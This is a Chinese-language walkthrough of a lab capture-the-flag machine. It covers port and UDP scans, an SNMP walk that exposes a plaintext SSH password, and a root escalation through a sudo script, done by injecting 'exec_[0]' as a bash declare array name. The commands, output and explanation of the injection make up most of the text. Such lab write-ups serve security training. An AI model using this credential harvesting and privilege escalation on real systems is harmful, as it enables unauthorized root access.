信息搜集
端口扫描
shell
┌──(kali㉿kali)-[~]
└─$ nmap -A -p- 192.168.21.7
Starting Nmap 7.99 ( https://nmap.org ) at 2026-10-07 05:38 -0400
Nmap scan report for 192.168.21.7
Host is up (0.00065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Mazesec welcome u
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:66:46:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.65 ms 192.168.21.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.59 seconds
漏洞利用
看一下80端口有什么
shell
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.21.7
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Mazesec welcome u</title>
<style>
body {
margin: 0;
padding: 0;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
background-color: #f5f5f5;
font-family: Arial, sans-serif;
}
.quote {
font-size: 2.5rem;
text-align: center;
color: #333;
padding: 20px;
max-width: 800px;
}
</style>
</head>
<body>
<div class="quote">
The quieter you become, the more you are able to hear.
</div>
</body>
</html>
目录枚举
shell
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.21.7 -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.21.7
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: html,php,txt,jpg,png,zip,git
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 796]
server-status (Status: 403) [Size: 277]
logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 277]
Progress: 9482016 / 9482016 (100.00%)
===============================================================
Finished
===============================================================
没发现什么能走的方向了,在扫一下udp端口
shell
┌──(kali㉿kali)-[~]
└─$ nmap -sU --min-rate=10000 192.168.21.7
Starting Nmap 7.99 ( https://nmap.org ) at 2026-10-07 06:54 -0400
Nmap scan report for 192.168.21.7
Host is up (0.00049s latency).
Not shown: 993 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
MAC Address: 08:00:27:66:46:FA (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.99 seconds
看一下snmp有什么https://hacktricks.wiki/network-services-pentesting/pentesting-snmp/index.html
shell
┌──(kali㉿kali)-[~]
└─$ snmpbulkwalk -c public -v2c 192.168.21.7
iso.3.6.1.2.1.25.4.2.1.4.383 = STRING: "service --user welcome --password mMOq2WWONQiiY8TinSRF --host localhost --port 8080"
使用账号密码尝试登陆一下
shell
┌──(kali㉿kali)-[~]
└─$ ssh welcome@192.168.21.7
The authenticity of host '192.168.21.7 (192.168.21.7)' can't be established.
ED25519 key fingerprint is: SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.21.7' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
welcome@192.168.21.7's password:
Linux 113 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan 14 08:32:23 2026 from 192.168.3.94
welcome@113:~$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)
权限提升
shell
welcome@113:~$ ls -la
total 24
drwxr-xr-x 2 welcome welcome 4096 Jan 14 2026 .
drwxr-xr-x 3 root root 4096 Apr 11 2025 ..
lrwxrwxrwx 1 root root 9 Jan 14 2026 .bash_history -> /dev/null
-rw-r--r-- 1 welcome welcome 220 Apr 11 2025 .bash_logout
-rw-r--r-- 1 welcome welcome 3526 Apr 11 2025 .bashrc
-rw-r--r-- 1 welcome welcome 807 Apr 11 2025 .profile
-rw-r--r-- 1 root root 44 Jan 14 2026 user.txt
welcome@113:~$ sudo -l
Matching Defaults entries for welcome on 113:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on 113:
(ALL) NOPASSWD: /opt/113.sh
welcome@113:~$ cat /opt/113.sh
#!/bin/bash
sandbox=$(mktemp -d)
cd $sandbox
if [ "$#" -ne 3 ];then
exit
fi
if [ "$3" != "mazesec" ]
then
echo "\$3 must be mazesec"
exit
else
/bin/cp /usr/bin/mazesec $sandbox
exec_="$sandbox/mazesec"
fi
//只检查了字符串exec_。如果传入exec_[0],declare会把exec_变成数组,并设置第0个元素为/bin/bash。之后$exec_等价于${exec_[0]},于是执行/bin/bash,而脚本本身是通过sudo以root运行的,所以得到root shell
if [ "$1" = "exec_" ];then
exit
fi
declare -- "$1"="$2"
$exec_
welcome@113:~$ sudo /opt/113.sh 'exec_[0]' '/bin/bash' mazesec
root@113:/tmp/tmp.fLo2tSwt6k# id
uid=0(root) gid=0(root) groups=0(root)